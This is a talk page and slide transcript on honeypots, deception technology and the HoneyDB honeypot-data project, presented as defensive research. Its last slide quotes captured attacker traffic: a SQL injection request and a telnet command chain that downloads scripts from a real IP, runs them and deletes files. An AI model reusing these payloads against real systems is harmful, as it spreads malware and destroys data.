 
CTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat IntelligenceCTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat Intelligence
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant
 

Similar to Honeypots, Deception, and Frankenstein

Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Phillip Maddux
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secureEoin Keary
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectiveSecurity Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectivePositive Hack Days
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Eoin Keary
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Cenzic
 
Introduction to Honeypots
Introduction to HoneypotsIntroduction to Honeypots
Introduction to HoneypotsEmil Tan
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trumpMAXfocus
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primeramiable_indian
 
Asset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsAsset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsRedhuntLabs2
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTSimone Onofri
 
Web security – everything we know is wrong cloud version
Web security – everything we know is wrong cloud versionWeb security – everything we know is wrong cloud version
Web security – everything we know is wrong cloud versionEoin Keary
 
Cyber security and attack analysis : how Cisco uses graph analytics
Cyber security and attack analysis : how Cisco uses graph analyticsCyber security and attack analysis : how Cisco uses graph analytics
Cyber security and attack analysis : how Cisco uses graph analyticsLinkurious
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)Phillip Maddux
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilOWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilJonathan Marcil
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineLastline, Inc.
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg Tunde Ogunkoya
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.Kalpesh Doru
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 

Similar to Honeypots, Deception, and Frankenstein (20)

Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secure
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectiveSecurity Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC Perspective
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
 
Introduction to Honeypots
Introduction to HoneypotsIntroduction to Honeypots
Introduction to Honeypots
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trump
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
 
Asset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsAsset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt Labs
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
Web security – everything we know is wrong cloud version
Web security – everything we know is wrong cloud versionWeb security – everything we know is wrong cloud version
Web security – everything we know is wrong cloud version
 
Cyber security and attack analysis : how Cisco uses graph analytics
Cyber security and attack analysis : how Cisco uses graph analyticsCyber security and attack analysis : how Cisco uses graph analytics
Cyber security and attack analysis : how Cisco uses graph analytics
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourself
 
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilOWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 

More from Phillip Maddux

The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!Phillip Maddux
 
CSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudCSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudPhillip Maddux
 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Phillip Maddux
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsPhillip Maddux
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsPhillip Maddux
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)Phillip Maddux
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)Phillip Maddux
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)Phillip Maddux
 

More from Phillip Maddux (8)

The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!
 
CSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudCSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloud
 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operations
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOps
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)
 

Recently uploaded

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 

Recently uploaded (20)

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 

Honeypots, Deception, and Frankenstein

  • 2. BIO Career Summary ● WebDev, DBA, SA, IT Auditor (~7 yrs) ● AppSec in Financials, EY & GS (~9 yrs) On the socials ● Twitter: @foospidy ● Github: http://github.com/foospidy ● LinkedIn: http://linkedin.pxmx.io ● Blog: http://pxmx.io Phillip Maddux Trusted AppSec Advisor and Senior Solutions Engineer @ Signal Sciences https://signalsciences.com SOURCE Boston 2018
  • 3. Agenda of the Cybers ● Honeypots 101 ● Cyber Deception ● HoneyPy - Quick Update ● Frankenstein (HoneyDB Project) ● Q&A
  • 4. Honeypots 101 A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers. Types of Honeypots: - Production - Research Levels of Interaction: Low Emulated services, very limited interaction, no login capability (low risk). Medium Emulated services, emulated login, emulated commands. High Actual services, system logins, and commands (very risky).
  • 5. Honeypots 101 - Production Honeypots Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless… - Something is misconfigured on the network - A malicious actor on the network Production honeypots are an additional layer to your defense strategy. - Honeypot logs are low volume and high value - Honeypots introduce risk to the attacker
  • 6. Honeypots 101 - Research Honeypots
  • 7. Honeypots 101 - Production Honeypots Additional Layer to… Preventative controls - Network & application firewalls - Intrusion prevention systems - Patch management - Network compartmentalization - Anti-virus Detective controls - Intrusion detection systems - Network traffic analysis - Endpoint monitoring Control validation - Vulnerability scans - Audits - Penetration testing - Control performance monitoring Honeypots - Produces low volumes of data compared to the volumes of data from all other preventative and detective controls
  • 8. Honeypots 101 - Research Honeypots Research honeypots can have many purposes, it just depends on what the research goals are. Examples: - Identify sources of malicious traffic - Discover active malware, botnets, and C&C servers - Learn about attacker techniques & tools
  • 9. Honeypots 101 - Research Honeypots Bots Scanners Malware DDoS Botnets etc. Internet
  • 10. Honeypots 101 - Research Honeypots ShmooCon 2015 Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap - Reversing malware - Uncovering c2 servers - Uncovering imminent ddos attacks Presentation video Now doing really cool stuff with… (https://greynoise.io/)
  • 11. Honeypots 101 - Hobbyist Honeypots - Try it out. - It’s fun! This is not me. (this is totally me)
  • 13. The First Rule of Cyber Deception
  • 14. Image Source You Must Show This Image
  • 15. Deception Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1] 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 16. Deception Automation Automation for: - Deploying deception endpoints as VMs, containers, or processes. - Configuration of deception endpoints. Centralized management interface, or API driven.
  • 17. Deception Lures Lures (aka breadcrumbs) - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1] - Credentials to network resources or applications. - Shortcuts to applications or other services, e.g. FTP, Telnet, SSH. - Browser artifacts, e.g. history, favorites, cookies. - Database connection strings - Network drives - etc. 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 18. Deception Solutions Very fancy implementations of honeypots
  • 19. Deception Layers Network services - SSH, Telnet, FTP, etc. Applications - cookies, directories, logins, functionality, etc. Data - watermarks, triggers, records access, etc.
  • 20. Deception in Applications 2017 Herb Todd: Tangled Web: Defense in Deception - The goals of deception from the perspective of both the attacker and defender - The elements and processes needed to plan, prepare, execute, and monitor effective deception - The types of deception techniques that are effective and how they translate into actual web application capabilities - How to identify and respond to various types of attackers. Presentation video My takeaway - a tailored solution is needed
  • 22. Deception Goal Integrate deception throughout your network and applications so you become a high risk to attackers
  • 23. Deception Market Approximately 20 companies Raised at least 201 million dollars Top 5 funded range 19 million to 46 million 2 acquisitions All this over the last 4, maybe 5 years Numbers based on data from crunchbase.com as of Fall 2017
  • 24. Deception Challenges The concept of honeypots & deception has been around for years The Cuckoo’s Egg - 1989 Bsides Raleigh 2017 (now Bsides RDU) source
  • 25. Deception Challenges Why isn’t everyone already doing deception?
  • 27. Deception Challenges Over the last 10 to 15 years organizations have focused on getting the basics done… ● Vulnerability Assessment ● Patch Management ● Endpoint protection ● Network Monitoring (IDS/IPS) ● Controls Validation ● Security awareness / training Deception ● No resources ● Not a priority ● Not fully understood
  • 28. Deception Challenges However, as organizations are becoming more mature in their security programs they are now thinking about deception… What does a deception program look like for their organization?
  • 29. Deception Program Initial thoughts… ● Scope… intruder vs. insider, or both? ● Output... alerts vs. counter intelligence, or both? ● Coverage… external vs. internal, or both? ● Assets… network, applications, data? ● Validation… metrics and testing. ● Incident response… integration and prioritization. Audit & Compliance?
  • 30. Deception Challenges Some other challenges… ● Some existing solutions are heavy/complex to deploy (also operational risk). ● Lures & breadcrumb management. ● Vulnerability scans reporting on sensors. ● Deception data risk (data is fake, incident is real). ● External facing deception can have an impact on security scorecard. ● How to implement deception in 3rd party vendor environments.
  • 31. Deception Takeaways Get the basics covered first Think about your deception story (program) Investigate solutions that are right sized for your organization’s maturity level A solution needs to: - have capability to be tailored - be easy to deploy - be easy to automate and integrate - be light weight / low touch to manage
  • 34. HoneyPy - Low to medium interaction honeypot. - Plugin based to implement various network services (tcp or udp). - Open source, on Github https://github.com/foospidy/HoneyPy - Written in Python. - Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins - Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg - Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers
  • 35. HoneyDB HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs. honeydb.io (redirects to riskdiscovery.com/honeydb)
  • 36. HoneyDB - Features Data visualization…
  • 38. HoneyDB - Features Threat Information - Bad-hosts - Sensor Data - Twitter Threat Feed
  • 40. HoneyDB - Original Architecture Web API
  • 41. HoneyDB - Scale Problem Web API
  • 42. HoneyDB - Reliability Problem Fun reading… http://www.cloudatacost.com/mystory https://www.reddit.com/r/CloudAtCost/
  • 43. HoneyDB - $$$? Decent web servers and data storage could run about $400-$500 per month. Current 90 day storage 50 GB
  • 44. HoneyDB - How To Get $$$? Idea… Honeypots As A Service (HaaS)
  • 45. HoneyDB - How To Get $$$? Idea… Honeypots As A Service (HaaS)
  • 46. HoneyDB - You Have To HaaS it! Attempt a demo.
  • 47. HoneyDB - Turns Out… You Don’t Have To HaaS it! Or nobody wants to HaaS it =(
  • 48. HoneyDB - But Wait, CarolinaCon Connection! http://novcon.net/ Offered VMs for free! btw… they also operate the threat info project.
  • 49. HoneyDB - Reliable Servers But still need to scale
  • 51. HoneyDB - Frankenstein Cloud Architecture “Frankenstein scaaaaaaaaaaaaale” - Frankenstein
  • 52. HoneyDB - Frankenstein Cloud Architecture
  • 53. HoneyDB - Frankenstein Cloud Architecture Serverless (functions) Google Cloud BigQuery PubSub Novcon VMs Honeydb web / api MySQL (Secondary) MySQL (Primary) get hmac post events post eventspull events pull tweets Redis - API Request Limiting replicate query inserts stream events Coming soon
  • 54. HoneyDB - What about... Blockchain?
  • 56. HoneyDB - Note On Serverless Functions IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost. AWS Lambda is good - robust, but expensive… API gateway charges. Google Cloud Functions is disappointing - easy to deploy, only nodejs, but… Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why? Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
  • 57. HoneyDB - Ok, So What Does It Cost?
  • 58. HoneyDB - Ok, So What Does It Cost?
  • 59. HoneyDB - How To Money? Cryptocurrency Mining...
  • 60. HoneyDB - How To Money? Not practical, but wrote a cool script... HoneyMiner https://github.com/foospidy/HoneyMiner
  • 61. HoneyDB - How To Money? Masternodes… Greater privacy of transactions Performing immediate transactions Participation in proceedings and voting Activate budgeting and cashier system in cryptocurrencies
  • 62. HoneyDB - How To Money? Currently running 5 masternodes across 2 VPS Yields about $100 to $200 per month.
  • 63. HoneyDB - But that crypto though. Masternodes have potential, but requires an initial investment, and at the mercy of market volatility.
  • 64. HoneyDB - How to money? Other options… Sponsorships Commercial Licensing
  • 65. HoneyDB - Back To HaaS Tools to get you honeypotting ● Honeydb-agent ○ Like HoneyPy, but a binary ● API Endpoints ● HoneyDB CLI
  • 66. HoneyDB - New API Client Wrapper and CLI pip install honeydb usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty] optional arguments: -h, --help show this help message and exit --bad-hosts Get bad hosts. --sensor-data-count Get sensor data count. --sensor-data Get sensor data. --threatbin Get ThreatBin entries. --twitter-threat-feed Get Twitter Threat Feed. --mydata Filter on mydata. --date DATE Date in format YYYY-MM-DD --ip-address IP_ADDRESS IP address to filter on. --from-id FROM_ID ID to continue retrieving sensor data. --pretty Print JSON in pretty format.
  • 68. HoneyDB - Examples... Web GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR (45,120,50,45,81,45)--%20%20 HTTP/1.1 Host: x.x.x.x Accept: */* Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
